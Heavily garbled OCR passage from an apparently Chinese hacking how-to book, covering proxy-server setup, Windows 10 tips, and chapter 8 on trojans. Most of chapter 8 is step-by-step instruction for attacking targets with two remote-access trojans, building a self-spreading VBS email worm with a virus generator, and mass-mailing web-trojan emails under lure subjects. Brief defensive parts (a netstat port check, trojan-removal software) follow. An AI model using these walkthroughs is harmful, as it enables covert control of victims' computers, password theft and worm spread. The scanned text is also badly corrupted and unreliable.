器 之 间 的 另 一 台 服 务 器 ， 其 主要 功能 就 是 
代理 网 络 用 户 去 取得 网 络 信息 ， 类 似 于 网 
络 信息 的 中 转 站 。 如 下 图 所 示 即 为 代理 服 
务 器 的 工作 流程 。 


路 由 器 代理 服务 器 。 请 
外 部 网 + 于 加 一 
~ 


目前 ， 获 取代 理 服务 器 的 方法 有 很 多 ， 
应 用 最 为 广泛 就 是 使 用 搜索 引擎 ， 这 里 以 百 
度 为 例 ， 利 用 浏览 器 打开 百度 搜索 引擎 输入 
关键 字 “ 免 费 代理 服务 器 ”之 后 ， 单 击 “ 百 
度 一 下 ”按钮 ， 即 可 找到 许多 免费 代理 服务 
的 网 站 。 用 户 可 以 进入 代理 网 站 ， 每 个 网 站 
都 有 相应 的 代理 记录 ， 如 下 图 所 示 。 


而 本 | 3 mm ee x | CT 

人 Maem balducom i 
» 

Bai 瘦 林 度 | 多 fm 


hap zhiianda 扩 cn 2019.03 ~ Ve -主公 


代理 jp 全 国 匿名 代理 在 线 代理 可 隐 苛 |P ip 人 
所 动 志 代 再 自动 本 站 工具 下 号 |P 吉 训 台 座 代 奸 季 和 次 人 再 瑞 呈 从 了 二 二 要 要 法 后 
Ww wandeuip com 2019.03 2 


锡 蓝 服 各 器 上 骨科 
各 和 总 上 彤 他 诗 扩 一 0 
号 fhwcom 201903 ”Ya -证 从 广 三 


多 要 代理 
慰 量 听信 |P 当 涯 价格 反攻 你 二 性 扫 济 
Wwyunbanruanjian cn 201993 - 


用 吉 HTTP HTTPS SOCKS5 竺 议 二 注 机 全身 


实战 演练 2 一 一 在 上 中 设置 代理 服务 器 


”使 用 代理 服务 器 之 前 要 先 对 其 进行 设 
置 ， 下 面 以 在 还 浏览 器 中 设置 代理 服务 器 
为 例 进行 简单 的 介绍 。 在 下 浏览 器 中 设置 
代理 服务 器 的 具体 操作 步骤 如 下 。 

Eee 国 右 去 正 图标， 在 弹出 的 快捷 菜单 中 
选择 “属性 ”菜单 命令 ， 即 可 打开 “Intermnet 


第 7 章 ”黑客 信息 的 追踪 与 代理 服务 器 的 应 用 


属性 ”对 话 框 ， 选 择 “ 连 接 ” 选 项 卡 ， 如 下 
图 所 示 。 


和 Internet 尾 性 ? x 
竺 规 安全 。 隐私。 内 容 连接 。 程序 高 有 
0 sainenetss, #=as. 
授 号 和 志 拟 专用 网 络 设置 
| 活 加 (D).… 
[sd 

如 果 要 为 入 接 配置 代理 受 务 器 ， 请 充 择 设置。 设置 {9 
RUANi 

IAN 讼 村 不 由 用 到 扣 这 接 ， 对 于 损 S 设 置 ， 单 要 。 | ”局 杂交 

上 失守 按 . 

a 2 EE 


[step 图 单 击 “ 局 域 网 设置 ”按钮 ， 即 可 打开 

“局 域 网 (LAN) 设置 ”对 话 框 ， 选 中 “为 
LAN 使 用 代理 服务 器 (这 些 设置 不 用 于 拨 
号 或 VPN 连接 )” 复 选 框 ， 然 后 在 “地 址 ” 
文本 框 和 “端口 ” 文本 框 中 输入 代理 服务 
器 的 地 址 和 端口 号 ， 如 下 图 所 示 。 


多 局 过 网 LAN) 设 置 x 


语 动 配置 
自动 配置 会 相差 手动 设置 ， 要 确保 使 用 手动 设置 ， 请 禁用 合 动 配置 


口 自动 检测 设置 (A) 


口 借用 生动 配置 券 本 (S) 


人 于 服务 器 


回 为 LAN 使 用 代理 最 务 器 ( 福 些 设置 不 用 于 挨 号 或 VPN 连接 )(X) 


地 址 (E): 。 [80.147:245:125]| 久 DID [80 | | 语 有 OO 


口 对 于 本 地 地 址 不 使 用 代理 服务 器 (B) 


[| 
[ep 国 单 击 “ 确 定 ” 按 钮 完成 设置 ， 再 使 用 
焉 浏览 器 时 将 会 发 现 , 无 论 浏览 哪个 网 站 ， 
焉 浏览 器 总 是 会 先 和 代理 服务 器 建立 连接 。 


下 
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7.4 小 试 身 手 


加 练习 1: 调 出 常用 桌面 图 标 


刚 装 好 Windows 10 操作 系统 时 ， 桌 面 


上 只 有 “回收 站 ”和 “此 电脑 ”两 个 桌面 图 标 ， 


用 户 可 以 调 出 其 他 常用 桌面 图 标 ， 具 体 的 
操作 步 又 如 下 。 

[step 图 在 桌面 上 空白 处 右 击 ， 在 弹出 的 快捷 
菜单 中 选择 “个 性 化 ”菜单 命令 ， 如 下 图 
所 示 。 


豆 看 V) 
排序 方式 (O) 
i(E) 


图 NvIDIA 控 面 村 
只 一 anE 
新 建 (W) 
器 出) 
i ELIR) [NS 


EE 国 弹出 “设置 -个 性 化 ”窗口 ， 在 其 中 
选择 “主题 ”选项 ， 如 下 图 所 示 。 


加 Ht 

| 主题 

we DU 

Ce 相关 的 设置 

二 蝴 | 
aoa 

nm i 


[step 图 单 击 左 侧 窗 格 中 的 “桌面 图 标 设置 ” 
链接 ， 弹 出 “桌面 图 标 设置 ”对 话 框 ， 在 
其 中 选中 需要 添加 的 系统 图 标 复 选 框 ， 如 
下 图 所 示 。 


5 se 
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[Eee 图 单 去 “确定 ”按钮 ， 选 择 的 图 标 即 可 
在 桌面 上 添加 ， 如 下 图 所 示 。 


练习 2: 开启 计算 机 的 平板 模式 


Windows 10 新 增 了 一 种 使 用 模式 一 一 平 
板 模 式 ， 它 可 以 使 用 户 的 计算 机 像 平 板 电 脑 
一 样 使 用 ， 开 启 平板 模式 的 操作 步骤 如 下 。 
[step 图 单 击 桌面 右 下 角 通 知 区 域 中 的 “通知 ” 
图 标 贺 ， 在 弹出 的 窗口 中 单 击 “ 平 板 模式 ” 
图 标 ， 如 下 图 所 示 。 


免 打 扰 时 间 
16:03 


个 加 避 国 2016/6/17 
[step 图 返回 桌面 ， 即 可 看 到 系统 桌面 变 为 平 
板 模 式 , 如 下 图 所 示 , 可 拖 慢 光标 进行 体验 。 
如 果 计 算 机 支持 触 屏 操作 ， 则 体验 效果 更 
佳 ;， 如 要 退出 平板 模式 ， 则 再 次 单 击 “ 平 
板 模式 ”图 标 即 可 。 


第 8 革 木马 病毒 的 防御 与 杀毒 
软件 的 使 用 


在 网 络 中 ， 木 马 病 毒 入 侵 是 黑客 最 常用 的 入 侵 方 法 ， 从 而 影响 网 络 和 计算 机 的 正常 
运行 。 木 马 病毒 对 计算 机 有 着 强大 的 控制 和 破坏 能 力 ， 能 够 盗 取 目标 主机 的 登录 账户 和 密 
码 、 控 制 目标 主机 的 操作 系统 和 文件 等 。 本 章 介绍 木马 病毒 的 防御 与 杀毒 软件 的 使 用 ， 主 


要 内 容 包括 常见 木马 与 病毒 的 攻击 方法 、 


8.1 常见 木马 病毒 的 攻击 方法 


将 木马 程序 和 其 他 正常 的 程序 捆绑 
在 一 起 ， 或 通过 加 壳 、 加 花 指 令 为 木马 
添加 自我 保护 功能 后 ， 就 可 以 放心 地 将 
程序 放置 到 目标 计算 机 中 ， 一 旦 运行 带 
有 木马 的 程序 ， 木 马 就 随 之 入 侵 该 计算 
机 并 在 后 台 开 始 工作 ， 从 而 完全 控制 这 
台 计 算 机 。 


绝招 1: 使 用 “ 广 外 女生 ”木马 攻击 


“ 广 外 女生 ”木马 的 可 怕 之 处 在 于 其 服 
务 端 被 执行 之 后 ， 将 自动 检查 进程 中 是 否 
含有 金山 毒霸 、 防 火 墙 、 实 时 监控 、 天 网 
等 字样 ， 如 果 发 现 就 将 该 进程 终止 ， 也 就 
是 所 谓 的 使 防火 墙 完全 禁用 。 

使 用 “ 广 外 女生 ”木马 进行 攻击 的 具 
体操 作 步 又 如 下 。 

[step 图 下 载 并 解压 缩 “ 广 外 女生 ”压缩 包 文 
件 ， 双 击 其 中 的 客户 端 程 序 GWegirl， 即 可 
打开 “ 广 外 女生 ”客户 端 窗 口 ， 如 下 图 所 示 。 


常见 


杀毒 软件 的 使 用 、 病 毒 专 杀 工 具 的 使 用 等 。 


天 六 中 大 生 1538 二 记得 一 x 
文 拉 并 享 | 运程 译 革 表 | 进 各 管理 (finox] | 污 吕 主机 | 局 竺 人 | 密码 记录 | 服务 油 设 各 | 世相 吕 虹 | 


“i. 


修复 吉 什 通知 5 站、 


sphe(.1) 
i 
人 省 mehinw Fr 
Bet /fee meirl ea/ 


8 “ 广 外 女 全” 守 用 朱 区 :ghzll8elon. oon 


Step 图 选择 “服务 端 设置 ”选项 卡 ,进入 到 “ 服 
务 端 设置 ”设置 界面 ， 根 据 实 际 情况 进行 
相应 的 设置 ， 如 下 图 所 示 。 


| 殉 广 站 关 生 1538 吉庆 二 加 
文 所 具 享 | 远程 注 半 夫 | 进程 管理 fyin2z] | 渗 加 主机 | 忆 东 信人 | 宣 至 记录 ”服务 庙 设 置 | 版 本 凑 明 | 


万 部 件 明知 列表 
CEE 


关于 更 杀 服 和 庙 计 参考 记 朋 六 件 
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[step 图 单 去 “生成 服务 端 ” 按 钮 ， 即 可 在 该 
客户 端 当 前 文件 夹 中 生成 一 个 默认 文件 名 
为 GDUFS.exe 的 服务 器 端 程序 。 
Ba 
CN 
文件 各 为 -GDUFS.exe 


请 主意 不 要 沁 点 了 该 文件 , 
匡 = 到 | 


[step 贺 选择 “添加 主机 ”选项 卡 ， 在 “起 始 
IP” 和 “终止 IP” 文 本 框 中 输入 同一 个 人 P 
地 址 ， 再 输入 验证 密码 、 连 接 端口 与 等 待 
时 限 ， 如 下 图 所 示 。 


| 网 三 外 女生 153B 训 广 这 人 冯 
tl sae | 天 生理 wiver) 过 相克 和 | 雪 记 有 | 机 | 


pm 
ee Ps 一 


这 5 


bE 


Er 


侈 提 示 : 等 待 时 限 的 设置 单位 是 ms (1s 一 
1000ms) ， 如 连接 成 功 则 会 在 列表 中 出 现 该 
IP 地 址 和 端口 号 。 


在 与 目标 主机 建立 连接 后 ， 选 择 “ 文 
件 共享 ”选项 卡 ， 如 下 图 所 示 ， 在 其 中 对 
目标 主机 上 的 多 种 功能 进行 和 本 地 机 几乎 
一 样 的 操作 ， 但 没有 文件 搜索 和 压缩 功能 。 


网 广 放 入 生 1538 客户 深 序 


x 
ce | | Heh | | | 

马 各 | 由 XX 的 名 由 全 要 轨 因 | 刀 

FE RR 
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[step 图 选择 “远程 注册 表 ” 选 项 卡 ， 在 其 中 
可 以 对 目标 主机 的 注册 表 进 行 管理 (该 选 
项 卡 模拟 了 Windows 中 的 注册 表 编 辑 器 )， 
如 下 图 所 示 。 


而 3 15 SEE 了 
a | rt | pe | as | 6 | | 


于 


[E73 


[Bee 国 选择 “进程 管理 ”选项 卡 ， 在 其 中 可 
以 对 目标 主机 上 的 所 有 进程 进行 管理 ， 如 
下 图 所 示 。 


El 


3 


[EGG 国 迁 择 “ 密 码 记录 ”选项 卡 ， 在 其 中 可 
以 查看 服务 端 程序 记录 的 密码 信息 ， 如 下 
图 所 示 。 


六 
ra | se | | hk | a 


特别 于: 


请 和 垃 者 他 人 的 上 网 市 吧 ! 
现 为 人 祖 理 由 的 1 


3 


“密码 记录 ”选项 卡 中 的 主要 参数 含义 


如 下 。 


(1) 单 击 “ 获 取 记 录 ” 按 钮 ， 可 以 查 
看 服务 端 程序 记录 的 用 户 名 密码 信息 。 

(2) 单 击 “ 清 空 记录 ”按钮 ， 即 可 清 
除 服 务 器 端 保存 的 密码 记录 。 

(3) 单 击 “ 保 存 记 录 ” 按 钮 ， 即 可 把 
服务 端的 密码 记录 保存 到 客户 端 。 

另外 ， 由 于 “ 广 外 女生 ”服务 端 程序 
运行 的 默认 端口 是 6267， 因 此 ， 可 使 用 
netstat-a 命令 查看 计算 机 上 是 否 开 放 了 6267 
端口 ， 如 果 开 放 了 6267 端口 ， 则 说 明 已 中 
了 “ 广 外 女生 ”木马 。 在 “命令 提示 符 ” 
窗口 中 输入 netstat-a 命令 ， 即 可 查看 是 否 开 
放 了 6267 端口 。 


SR Cvindows\eystom3Aemd ore -notetat a - oo x 
:\sars\Administrator netstat -a 
疾 动 连接 

协议 本 地 地 址 外 部 地 址 状态 

Tp 0.0.0.0:195 5S79QWDC3IDUUQ8:0 CLISTENING 
I 0, 0.0: B970QWDC3IDUUQ8:0 CLISTENING 
I B97GQWDC3IDUUQ8:0 CLISTENING 
Tp BorooWDC3L OUUQS: 0 ISTENIN 

ICP B97CQWDC3IDUUQS:0 CLISTENING 
ITCP B97GQWDC3IDUUQS:0 cLISTENING 
TP REED STR 
wm Benoaroesr ome:o STENTNG 
IE LISTENING 
IE i a 3 
ee TENI 
ee LISTENING 
Tp Beet: STEN 
Tp B97CQWDC3IDUUQRS:0 STEN 

ICP B97CQWDESIDUUQS:0 LISTENING 
ICP B97GQWDC3IDUUQS:0 CLISTENING 
I Borowpeat one: LISTENING 
TI LISTENING 
TI LISTENING 
he 311 ESTAELISHED 
ke 111, 208, 5 ESTAELISHED 
TI 52.290.3.1 ESTAELISHED 
TEP In:http ESTAELISHED 
TIP 27 Ie: CLOSE WAIT 


.19. 232, 200:ht tpe 
180. 163. 238, 165:http ESTAELISEED 


绝招 2: 使 用 “网 络 神偷 ”木马 攻击 


“网 络 神 偷 ” 是 一 款 反 弹性 端口 木马 
它 利用 “反弹 端口 ”原理 来 控制 服务 端 (被 
控制 端 主动 连接 客户 端 (控制 端 )， 只 要 
当 发 现 客户 端 让 自己 开始 连接 时 ， 就 会 主 
动 连接 。 这 样 ， 控 制 端 就 可 以 穿 过 防火 墙 ， 
从 而 控制 局 域 网 内 部 的 所 有 计算 机 。 

1. 设置 “网 络 神偷 ”运行 向 导 
[step 加 在 使 用 “网 络 神偷 ”文件 前 需要 先 对 
其 进行 设置 ， 第 一 次 运行 软件 时 会 自动 弹 
出 “网 络 神偷 首次 运行 向 导 ” 对 话 框 ， 在 
其 中 选择 支持 的 方式 ， 如 下 图 所 示 。 
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ie 个 车 闪 去 F 导 x 


[过 疡 z 


至 要 本 用 次 只， 居 全 为 记 法 择 _ 个 志 持 方式 、 语 从 下 面 的 到 持 方式 中 法 肥 _ 个 最 笑 合 你 的 : 


和 呈 等 一 次 二 下 宇 个 次 叶 ， 笑 要 二 或 去 特 对 全 用 
更 和 峰 3] 村 万 式 "， 伍 是 不 能够 内 网 到 外 网 ， 内 网 到 内 网 


雪人 
这 条 专用 元 持 方式 "， 适 诗 长 其 使用， 部 名 内 网 到 外 网 ， 内 网 到 内 网 , 


下 -NI > 


| 
图 单 击 “ 下 一 步 ” 按钮， 打开“ 使 用 临 
ry en 口 ， 在 其 中 显 
示 了 相关 的 提示 信息 ， 如 下 图 所 示 。 


网 站 入 从 苦 交 运行 由 导 x 


[用 用 时 到 将 方式 的 温 世 提示 ] 


站 时 人 的 计算 机 位 于 局 址 网 入 部， 全 并 通过 路 由 茵 上 网 ， 屠 么 你 只 能 方 同 同一 个 局 炬 网 
内 大 9i 算 而 ， 而 不 能 访问 互 际 网 或 基 它 局 世 网 为 9 计算 机 


CRP 网 到 外 网 ， 内 网 到 内 网 ) 


青 征 光 呈 网 入 管 之 前 ， 殉 认 你 的 计算 中 已 起 连 接 到 网 焙 ， 确 定 后 ， 奥 二 下 一 步 " 浆 绽 ， 


EC 
step 图 单 去“ 下 一 步 ”按钮 ， 打 开 “ 主 控制 


EC 口 ， 在 其 中 选中 “使 用 默认 
端口 2018 (推荐 ) ” 单 选 按钮 ， 如 下 图 所 示 。 
网 络 礼 从 首次 运行 启 导 b4 

庄 绽 甘美 口 全 要 | 


网 才 党 入 皇 一 个 网 洛 交 位。 所 以 主 榨 演技 要 与 忆 文 台 计 算术 的 一 个 UDP 闫 口 ， 青 员 委 : 


人 人 EMV 闪 D 2018 ( 殷 才 ) 


ERIRRMD | 


i: 

交 采 这 台 计 算 机 上 安 法 网 交 护 火 过 软件 【 俩 知 Windows XP 内 置 的 Windows 防火 
者 | ， 棵 8 车 太 允许 本 软件 沪 问 网 沼 ， 或 者 特 对 关闭 防火 夫 次 件 ， 否 则 本 软件 有 可能 无 法 
ET 


| 一 


119 


SEE 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[step 园 单 南 “完成” 按钮， 随即 打开 “网 络 
神偷 ”信息 提示 对 话 框 ， 提 示 用 户 想 要 访 
问 其 他 计算 机 ， 需 要 先 在 其 他 计算 机 上 安 
装 “ 被 控 端 软件 ”， 如 下 图 所 示 。 


FS 从 x 


FDC | 


[step 园 单 去 “确定 ”按钮 ， 打 开 “ 生 成 被 控 
端 软 件 ” 对 话 框 ， 在 “请 选择 被 控 端 软件 
的 版 本 ”下 拉 列 表 中 选择 “普通 版 ”选项 ， 
如 下 图 所 示 。 


和 过 光 计 x 


于 有 生 夺 过 守信 这 下 件 


| 三 li 


| 六 0 
| 
这 生计 舱 机 上 没有 实 凌 或 者 元 行 补 控 名 俯 隆 


[i] 和 


Bp 加 单 去 “开始 生成 ”按钮 ， 即 可 在 “网 
络 神偷 ”文件 夹 中 生成 相应 的 被 控 端 软件 ， 
双击 “被 控 端 软件 ”， 即 可 运行 该 被 控 端 程 
序 ， 如 下 图 所 示 。 


凰 | 回 四 = | 生成 时 间 3 月 20 日 .| 十 二 本 - 0O x 
EE 日 
个 国 “ 祖 控 .，， 生 成 时 间 - v 已 当 雪 "生成 /P| 
国 此 中 有 四 sw 
EE ED 国 被 近江 软件 ( 双 二 安装 ,可 以 改名 ) 
图 视 吕 ] 大 过 的 文人 为 术 控 负 软 件 ， 如 果 看 不 到 
同 国 上 
EE 
易 琶 
小 音 和 
国 点 析 
沁 Windows10 (C: 
0D | | 
2 个 项 目 选中 1 个 项 目 54.5 KB | 匿 世 


@ 移 提示 : 由 于 服务 端 程序 在 运行 后 不 会 显 
示 任 何 界面 ， 因 此 表面 上 什么 反应 也 看 不 
到 ， 其实 它 已 经 将 自己 复制 到 了 系统 里 面 ， 
并 且 会 在 对 方 每 次 开机 时 自动 运行 。 


2. 使 用 “网 络 神 偷 ” 攻 击 目 标 主机 


step 团 在 “网 络 神 偷 ” 主 窗口 单 击 “显示 在 
线 的 远程 计算 机 ”按钮 久 ， 即 可 在 “网 络 
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神偷 ”窗口 中 显示 在 线 的 计算 机 主机 列表 ， 
如 下 图 所 示 。 
ET 


00 二) Fis: wwnenhictnet aa: 1050271055 
| 


久 当 | 上 犁 名 一 如 网 X 
国正 回 包 二 副 襄 加 四 @ 辣 画 


下 RE 有 机 早上 5 一 HE。 周正 在 Wi 当 机 


1 


人 
carae 国 am sp) 


[step 图 在 “网 络 神偷 ” 主 窗口 中 单 击 “管理 
远程 计算 机 文件 ”按钮 澡 ， 即 可 在 “网 络 神 
偷 ” 窗 口中 显示 远程 在 线 主 机 的 计算 机 文 
件 信息 ， 如 下 图 所 示 。 


是 ies 的 139 白 - 主 近 尘 ( 呈 直 或 者 各 闪 者 忱 All-- 想 ) - i。 一 口 xX 
和 D(H) 安全 5) 网站: wwwncalNiefnet QQ: 1050271066 
[Se 9 


区 全 | 要 安利 | 外 序 | 加 三 XX 
国 马 回 包 才 副 避 四 加 @ 专 台 


Asprowa Ss 2 


ER 


[step 图 选中 远程 在 线 主 机 中 的 计算 机 文件 ， 
了 “网 络 神偷 ” 窗口 中 单 击 “ 上 传 文件 ”“ 下 
载 文件 ” “复制 ” “粘贴 ”等 按钮 ， 对 其 计 
算 机 文件 进行 管理 操作 ， 如 下 图 所 示 。 


是 eis 全 139 版 - 主 :2 兴 (显示 或 者 队 总， 对 从 Mt+~ 铺 - 6 到 一口 xX 
者 [HH) 安全 5) 网站， wwwnetthistnet QQ: 1050271066 


位 全 - 这 全 计算 机 没有 
区 FIEJEJRIEETIEE 了 XX 


国 可 回 包 = 汪 司 加 四 到 @ 外 到 


FE 
hei oniob 


绝招 3: 使 用 VBS 脚 本 病毒 攻击 


脚本 病毒 通常 是 由 JavaScript 代码 编写 
的 恶意 代码 ， 一 般 带 有 广告 性 质 、 修 改 正 
首页 、 修 改 注 册 表 等 信息 ， 脚 本 病毒 前 绥 
是 Script， 共 同 点 是 使 用 脚本 语言 编写 ， 通 
过 网 页 进行 传播 的 病毒 。 


1. VBS 脚 本 病毒 的 特点 


VBS 脚本 病毒 利用 Windows 系统 的 开 
放 性 特点 ， 通 过 调用 一 些 现 成 的 Windows 
对 象 、 组 件 ， 可 直接 对 文件 系统 、 注 册 表 
等 进行 控制 ， 具 有 编写 简单 、 破 坏 力 大 、 
感染 力 强 、 传 播 范围 大 、 病 毒 源 码 容 易 被 
获取 ， 变 种 多 、 欺 骗 性 强 等 特点 。 


2. 制作 VBS 脚 本 病毒 


现在 网 络 中 还 流行 有 如 “VBS 病毒 生 
成 器 ”这 样 的 自动 生成 脚本 语言 软件 ， 无 
须 掌 握 枯燥 的 语言 ， 即 可 自制 脚本 病毒 。 
它 通过 采用 用 户 的 各 项 输入 和 选择 自动 产 
生 符合 要 求 的 VBS 脚本 病毒 ， 很 适合 新 手 
们 使 用 。 

下 面 以 “病毒 制造 机 ”为 例 介绍 自制 
脚本 病毒 ， 具 体 的 操作 步骤 如 下 。 

[eep 回 下 载 “ 病 毒 制造 机 ”软件 并 解压 缩 ， 
双击 可 执行 程序 ， 即 可 打开 “第 一 步 了 
解 本 程序 ”窗口 ， 如 下 图 所 示 。 


园 庆 过 制 千 机 = 
[5m 一] 第 一 步 了 解 本 程序 
加 

| 


| 


2 下 - 步 


[step 较 单 南 “ 下 一 步 ” 按 钮 ， 即 可 打开 “第 
二 步 。” 病 毒 复 制 选项 ”窗口 , 在 其 中 选中 “ 复 
制 病毒 副本 到 启动 菜单 ” 复 选 框 ， 如 下 图 
所 示 。 
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第 二 步 病毒 旧制 选项 


a 
iri 于 
Ni A 
季 
MH I 
Tw AT 


[step 图 单 去 “下 一 步 ” 按 钮 ， 即 可 打开 “第 
三 步 ”禁止 功 能 选项 ”窗口 ， 在 其 中 根据 
要 设计 的 脚本 病毒 功能 选中 合适 的 复 选 框 ， 
如 下 图 所 示 。 


[step 图 单 击 “ 下 一 步 ”按钮 ， 即 可 打开 “第 
四 步 ” 病毒 提示 对 话 框 ”窗口 ， 在 “设置 
开机 提示 框 标题 ”和 “设置 开机 提示 框 内 容 ” 
输入 框 中 输入 字符 ， 如 下 图 所 示 。 


一 | 第 四 步 病毒 提示 对 话 杠 


A 
aa | 忆 aszntaTaize 

| 

ai 届时 有 机 愉 直 必 和 全! 区 十 开 ， 亚 雷光 才 的 网 客 1 | ] 


AF 


lr- 


[step 图 单 击 “ 下 一 步 ” 按 钮 ， 即 可 打开 “第 
五 步 ” 病毒 传播 选项 ”窗口 ,在 其 中 选中 “ 通 
过 电子 邮件 自动 传播 (蠕虫 )” 复 选 框 ， 并 
在 下 方 文 本 框 中 输入 相应 的 数值 ， 这 里 输 
入 20， 表 示 对 邮箱 地 址 簿 中 前 20 名 的 联系 
人 发 送 带 毒 邮件 ， 然 后 输入 主题 与 正文 内 
容 ， 如 下 图 所 示 。 


第 五 步 病毒 传播 选项 


ns 

i 所 阵地 间 动人 ( 问 上 ) 
i 王 认 运行 自动 地 直 竺 中 的 苘 ED ”名 发 送 这 过 是 
ri 了 和 主人, 二 RE 

正文 3 文件 证 ET T 
9 
放 
JE 二 2 T- 生 


了 


= 黑客 攻防 与 网 络 安全 从 新 手 到 高 手 ( 绝招 篇 ) 


[sep 国 单 去 “下 一 步 ” 按 钮 ， 即 可 打开 “第 

六 步 下 修改 选项 ”窗口 ， 在 其 中 根据 要 
设计 的 脚本 病毒 的 功能 选中 相应 复 选 框 
如 下 图 所 示 。 


[ws | 第 六 步 IE 修改 选项 
口 禁用 TE 右键 菜单 口 禁止 更 区 历史 记录 设置 
吕 襄 摘 烧 香 加 禁 目 pnternet 选 项 口 禁止 internet 连 接 向 导 
Oo 口 医用 “另存 为.….” 妈 单 二 页 
口 禁用 “文件 :打开 ”菜单 。 四 禁 目 安全 项 
口 羽 % 舞 问 禁止 更 改 高 级 页 设置 禁止 “ 重 寺 yeb 设 置 
出 岂 村 此 更改 性 时 文件 设 次 。 ”站 | 符 目 查看 源 文件 
DO 症 口 可 目 更 惧 自 动 包 置 口 禁 目 添加 陪 刀 页 计划 
口 埋 目 更 次 主页 口 禁止 资 源 管理 器 中 文件 荣 单 


上 上 = 步 = 此 


[sep 贺 单 击 “ 下 一 步 ”按钮 ， 即 可 打开 “第 
七 步 。 开始 制造 病毒 ”窗口 ， 在 输入 框 中 
输入 脚本 病毒 文件 存放 的 位 置 ， 如 下 图 
所 示 。 


| 第 七 步 开始 制造 病毒 


请 困 入 姜文 件 有 让 位 置 : 
Ll 
3) 浏 昨 
加 
口 有 和 
DO 畦 
上 - 步 上 上 开始 制造 | 


step 国 单 击 “开始 制造 ”按钮 ， 即 可 完成 脚 
本 病毒 的 制作 ， 如 下 图 所 示 。 


[me = 
[ws 和 | 第 七 步 开始 制造 病毒 
提交 文件 丰 让 位 轩 : 
En ET 

癌 BMz 病 毒 
口 羽 % 舞 完成 
口 竺 

上- 工 He 车 | 


绝招 4: 使 用 邮箱 病毒 攻击 


一 般 情况 下 ， 邮 箱 病 毒 就 是 在 E-mail 
中 以 HTML 方式 内 嵌 网 页 木马 ， 使 邮件 
本 身 成 为 一 个 网 页 木马 。 下 面 介绍 使 用 邮 
件 病毒 进行 攻击 的 过 程 ， 具 体 的 操作 步骤 
如 下 。 
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Estee 加 使 用 下 浏览 器 打开 事先 准备 好 的 
一 个 容易 隐藏 病毒 木马 且 内 容 吸引 人 的 
网 页 ， 如 下 图 所 示 。 


[step 图 选择 “查看 ”一 “ 源 ” 选 项 ， 打开“ 记 
事 本 ”程序 ， 在 其 中 查看 源 文件 代码 ， 如 
下 图 所 示 。 


) EV) 大 区 


WA 标 称 出 可 隐 ; 
/和 
nc qiqs002()”100) 77 相间 隅 no0 
function0 [ 


/条 
rm 


put CdcHide0020", 100) 


将 所 有 的 网 页 内 容 复 制 到 Windows 的 
剪贴 板 中 ， 再 打开 一 个 可 以 任意 发 送 邮件 
的 工具 , 如 先河 邮件 群发 工具 , 如 下 图 所 示 。 


国 完 Jt 未 和 的 V22 。 htpy/wwwa715.， 一 口 x 

较 SA 回 准 回 关上 | 日 疆 省 四 和 国 # 页 

线 答 : 国 习 ms:[ 了 安 记 js: [i59186263 

了 -asil | me Result 

< > 

发 信人 名 

发 信守 :| 

信件 主题 

附件 : 企 习 
G 文本 邮件 信 体 内 容 .网 殉 

EE 

Td 1 ee 3 以 

A 

HT: EE 5 

已 沁 3 E33 


[step 加 将 先前 复制 到 剪贴 板 中 的 网 页 代码 粘 
贴 到 其 发 送 的 邮件 内 容 框 中 ， 如 下 图 所 示 。 
丽 千 ok 于 娄 F 注 赂 Vz2 hapy/mmwa7i5 一 口 X 
圈 SA 加 发 国史 上 加 SS 有 多 一 便 责 


名 : 民 引 ne 习 和 FS: [SW 


Ea Ti Tevet 


他 文本 邮件 信 体 内 容 ez 
J 


< 


将 预先 编辑 好 的 病毒 代码 ， 也 添加 到 
需要 发 送 的 网 页 代码 中 ， 选 中 “网 页 ” 单 
选 按钮 并 单 击 “ 导 入 ”按钮 ， 即 可 打开 “ 导 
入 电子 邮件 列表 ”对 话 框 ， 如 下 图 所 示 。 


i 
上 言 存 喇 ， 沁 网 福元 则 下 boyaone oom Jack 
窒 增 行 站 山行 次 清空 
取消 [| 


单 击 “ 增 行 ”按钮 ， 并 在 邮箱 地 址 列 
表 框 中 输入 收 件 人 邮箱 地 址 ， 然 后 单 击 “ 确 
定 ” 按 钮 ， 如 下 图 所 示 。 


于 -| xj 
轨 隧 ， 沁 DT 站: boyenone. com, Jack "| 
列 雪 行 。 中 太行 义 青 宇 
1238qq_ com 
567@l63. con| 
< ， 
文件 确定 了 省 | 司 
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step 国 在 “先河 邮件 群发 ” 主 窗 口中 输入 有 
关 发 件 人 信息 及 邮件 主题 ， 如 下 图 所 示 。 

国生 Se 的 V22 hepywwwa75 一 口 X 
国 呈 回头 和 回 趾 加 SH 3 路 而 助 图 页 


刁 安 有 18 eis 
Ema [iwe Healt 


< 
发 信人 名 :Fose 
发 信和 电邮: | 

信件 主题 : 乓 年 千 气 象 ， 奖 你 一 个 大 礼 和 + 


mi#: 罩 习 
矿 广 直 。 电信 内容 6 | 
ED 


或 思 
中 
是 


Ek Ec 重合 : 
[step 图 单 击 “ 发 送 ” 按 钮 ， 即 可 将 邮件 病毒 
发 送 到 指定 的 信箱 中 。 当 收 件 人 收 到 邮件 
之 后 ， 只 要 浏览 发 送 的 网 页 ， 就 能 中 病毒 。 


82 使 用 木马 清除 软件 清除 木马 


对 于 那些 识别 出 来 的 木马 程序 ， 可 以 
使 用 手工 清除 的 方法 将 其 删除 ， 但 是 如 果 
不 了 解 发 现 的 木马 ， 要 想 确定 木马 的 名 称 、 
入 侵 端 口 、 隐 藏 位 置 和 清除 方法 等 都 非常 
困难 ， 这 时 就 需要 使 用 木马 清除 软件 清除 
木马 了 。 


绝招 5: 使 用 《木马 清理 王 》 清 除 木马 。 pm 


《木马 清理 王 》 是 一 款 系统 辅助 杀毒 软 六 
件 ， 可 针对 当今 上 百 万 种 木马 及 其 变种 进 
行 有 效 查 杀 。 另 外 , 《木马 清理 王 》 还 通过 
系统 底层 的 驱动 保护 ， 有 效 抵御 未 知 木马 
的 侵入 。 

使 用 《木马 清理 王 》 清 除 木马 病毒 的 

具体 操作 步骤 如 下 。 
[step 图 下 载 并 安装 《木马 清理 王 》 软 件 ， 双 
击 桌 面 上 的 《木马 清理 王 》 快 捷 图 标 ， 即 
可 打开 《木马 清理 王 》 工 作 界面 ， 如 下 图 
所 示 。 
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加 后 于 不 持 : 市 六 的 是 过 在 姑 让: 


> 木 晴 理 王 示 楷 钦 件 和 上: 
大病 志 大 夺 人 括 ! 
ae 全 才 手 工交 技 上 所 扩 ， 
> 机 器 委 疝 才 去 半 工具 


加 次 件 信息 


未 用 
5002 天 如 


二 本 权 方式 
主格 上 本 呈 


靖 呈 所 本 中 5 从 07 


[Fes 国 单 去 “ 坦 杀 木 马 ”图 标 ， 进 入 木马 清 
